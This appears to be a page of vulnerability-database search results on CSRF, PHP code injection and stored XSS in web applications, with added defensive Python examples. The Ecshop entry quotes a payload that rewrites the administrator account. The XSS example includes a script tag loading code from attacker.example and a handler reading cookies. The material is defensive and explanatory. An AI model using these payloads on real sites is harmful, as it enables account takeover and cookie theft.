4 matches found

Cvelist
added 2024/01/16 3:55 p.m., 25 views

CVE-2023-3178 POST SMTP Mailer < 2.5.7 - Arbitrary Log Deletion via CSRF

The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged-in users with the manage_postman_smtp capability delete arbitrary logs via a CSRF attack...

AI score: 4.9, EPSS: 0.00162
Exploits: 2, References: 1
OSV
added 2022/08/12 3:15 p.m., 13 views

CVE-2022-37043

An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views an attacker-controlled page, a request will be sent to the application that appears to ...

CVSS: 5.7, AI score: 6.7
Exploits: 0, References: 2
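Both CSRF entries above share one failure mode: a state-changing endpoint trusts the session cookie alone, so a page the victim merely visits can drive it. The following is an added example (not code from POST SMTP Mailer, Zimbra, or this listing) of a synchronizer-token check in Python: a vulnerable handler that only checks the cookie and capability, beside a hardened one that also requires a per-session token the attacker's page cannot read. The endpoint name, `delete_log`, the capability name, and the request/session shapes are illustrative; the token check applies no matter how the session was established (normal login or preauth), which is the gap the Zimbra entry describes.

```python
"""Synchronizer-token CSRF check on a state-changing endpoint.

Added example; not code from POST SMTP Mailer, Zimbra, or the Vulners page.
Names (delete_log, MANAGE_CAPABILITY, Request, Session) are illustrative.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field

# Stand-in for a plugin capability such as manage_postman_smtp (assumption).
MANAGE_CAPABILITY = "manage_logs"


@dataclass
class Session:
    user: str
    capabilities: set[str]
    # Per-session secret; rendered into the site's own forms, never readable
    # from another origin.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    # The browser attaches cookies to cross-site form POSTs too, so the
    # session arrives even when the attacker's page made the request.
    cookie_session: Session | None
    params: dict[str, str]


LOGS: dict[str, str] = {}


def reset_logs() -> None:
    LOGS.clear()
    LOGS.update({"1": "log one", "2": "log two"})


def delete_log_vulnerable(req: Request) -> int:
    """Checks only that an authorised session cookie arrived: the failure
    mode in the entries above. A hidden form on any site can trigger it."""
    sess = req.cookie_session
    if sess is None or MANAGE_CAPABILITY not in sess.capabilities:
        return 403
    LOGS.pop(req.params.get("id", ""), None)
    return 200


def delete_log_hardened(req: Request) -> int:
    """Requires POST, the capability, and a token bound to the session.
    The cookie alone is not enough; the comparison is constant-time."""
    sess = req.cookie_session
    if req.method != "POST":
        return 405
    if sess is None or MANAGE_CAPABILITY not in sess.capabilities:
        return 403
    supplied = req.params.get("_token", "")
    if not hmac.compare_digest(supplied.encode(), sess.csrf_token.encode()):
        return 403
    LOGS.pop(req.params.get("id", ""), None)
    return 200


def cross_site_request(victim: Session, log_id: str) -> Request:
    """What an auto-submitting form on an attacker page produces: the
    victim's cookie rides along, but the attacker never saw the token."""
    return Request("POST", victim, {"id": log_id})


def legitimate_request(sess: Session, log_id: str) -> Request:
    """A request from the site's own form, which embeds the token."""
    return Request("POST", sess, {"id": log_id, "_token": sess.csrf_token})


def demo() -> dict[str, tuple[int, list[str]]]:
    """Run the same cross-site request against both handlers."""
    admin = Session("admin", {MANAGE_CAPABILITY})
    results = {}
    reset_logs()
    results["vulnerable_csrf"] = (delete_log_vulnerable(cross_site_request(admin, "1")), sorted(LOGS))
    reset_logs()
    results["hardened_csrf"] = (delete_log_hardened(cross_site_request(admin, "1")), sorted(LOGS))
    reset_logs()
    results["hardened_legit"] = (delete_log_hardened(legitimate_request(admin, "1")), sorted(LOGS))
    return results


if __name__ == "__main__":
    for name, (status, remaining) in demo().items():
        print(f"{name}: HTTP {status}, logs left {remaining}")
```

The capability check is kept in the hardened version because it answers a different question (is this user allowed?) from the token check (did this user intend the request?); the CVE above is a case where the first was present and the second missing.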
0day.today
added 2020/03/23 12:00 a.m., 288 views

Horde 5.2.22 CSV Import Code Execution Exploit

The Horde_Data module version 2.1.4 and earlier, present in Horde Groupware version 5.2.22, allows authenticated users to inject arbitrary PHP code, achieving remote code execution on the server hosting the web application. This module requires Metasploit: https://metasploit.com/download Current...

CVSS: 9.8, AI score: 0.4, EPSS: 0.84857
Exploits: 5
seebug.org
added 2010/09/20 12:00 a.m., 24 views

Ecshop 2.7.2 persistent XSS (administrator account can be obtained)

Brief description: When a user edits their profile, the filtering of JavaScript code is not strict enough, so XSS code goes straight into the database. Details: the "password protection question" field is not run through the regular-expression filter, while all the other fields are. We can enter XSS in the password protection question, but the back-end member profile view does not display the password protection question, so this requires that the site's back end has added a new "member registration item"; once it has, the back-end profile view does display it. Enter there a snippet that loads an external js file: " The external test.js file contains the following: Ajax.call('privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"); Proof of vulnerability: ...

AI score: 7.1
Exploits: 0
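The Ecshop entry above is a per-field input-filtering failure: one profile field was missed by the filter, was stored verbatim, and was later interpolated into an admin page where the leading `"` closes an attribute. The following is an added example (not Ecshop code) in Python that models this: a hypothetical script-tag filter applied to some fields but not others, a vulnerable admin view that interpolates raw values into a `value="..."` attribute, and a hardened view that escapes every value at output with quotes. The field names, the filter regex, the admin template, the `attacker.example` host, and both payloads are constructed for the example; the second payload shows why escaping at output, not filtering at input, is the fix, since it carries no `<script>` tag at all.

```python
"""Stored XSS: escape at output, in the context where the value lands.

Added example; not Ecshop code. Field names, filter, template and payloads
are constructed for illustration.
"""
from __future__ import annotations

import html
import re

# Hypothetical per-field input filter of the kind the report describes:
# applied to most profile fields, but not to the password question.
SCRIPT_TAG_RE = re.compile(r"<\s*script\b[^>]*>.*?<\s*/\s*script\s*>", re.I | re.S)


def filter_field(value: str) -> str:
    return SCRIPT_TAG_RE.sub("", value)


PROFILE_DB: dict[str, dict[str, str]] = {}


def save_profile(user: str, fields: dict[str, str], filtered: set[str]) -> None:
    """Store profile fields; only the fields named in `filtered` pass through
    the input filter, mirroring the missed field in the report."""
    PROFILE_DB[user] = {k: filter_field(v) if k in filtered else v for k, v in fields.items()}


def render_admin_view_vulnerable(user: str) -> str:
    """Admin view that interpolates raw stored values into an attribute."""
    return "".join(f'<input name="{k}" value="{v}">\n' for k, v in PROFILE_DB[user].items())


def render_admin_view_hardened(user: str) -> str:
    """Same view, escaping every value with quote=True because each lands
    inside a double-quoted attribute."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    return "".join(f'<input name="{esc(k)}" value="{esc(v)}">\n' for k, v in PROFILE_DB[user].items())


VALUE_RE = re.compile(r'value="([^"]*)"')


def recovered_values(markup: str) -> list[str]:
    """The value attributes as a browser would read them back, unescaped.
    If a payload broke out of its attribute, the recovered value is truncated."""
    return [html.unescape(m) for m in VALUE_RE.findall(markup)]


def injected_script(markup: str) -> bool:
    """True if a literal <script tag reached the output."""
    return re.search(r"<\s*script\b", markup, re.I) is not None


# Constructed payloads. The first mirrors the report: a leading quote closes
# the attribute and a script tag loads external JS (attacker.example is a
# placeholder host); the trailing <x a=" swallows the template's leftover ">.
EXTERNAL_JS_PAYLOAD = '"><script src="https://attacker.example/test.js"></script><x a="'
# The second has no <script> at all, so the input filter lets it through.
HANDLER_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def demo() -> dict[str, bool]:
    save_profile(
        "heihei",
        {"nickname": HANDLER_PAYLOAD, "password_question": EXTERNAL_JS_PAYLOAD},
        filtered={"nickname"},
    )
    vuln = render_admin_view_vulnerable("heihei")
    hard = render_admin_view_hardened("heihei")
    stored = list(PROFILE_DB["heihei"].values())
    return {
        "vulnerable_has_script": injected_script(vuln),
        "vulnerable_values_intact": recovered_values(vuln) == stored,
        "hardened_has_script": injected_script(hard),
        "hardened_values_intact": recovered_values(hard) == stored,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

In the vulnerable view both recovered values come back empty because each payload's leading quote ended the attribute early; in the hardened view both round-trip exactly, and the stored text is displayed rather than executed.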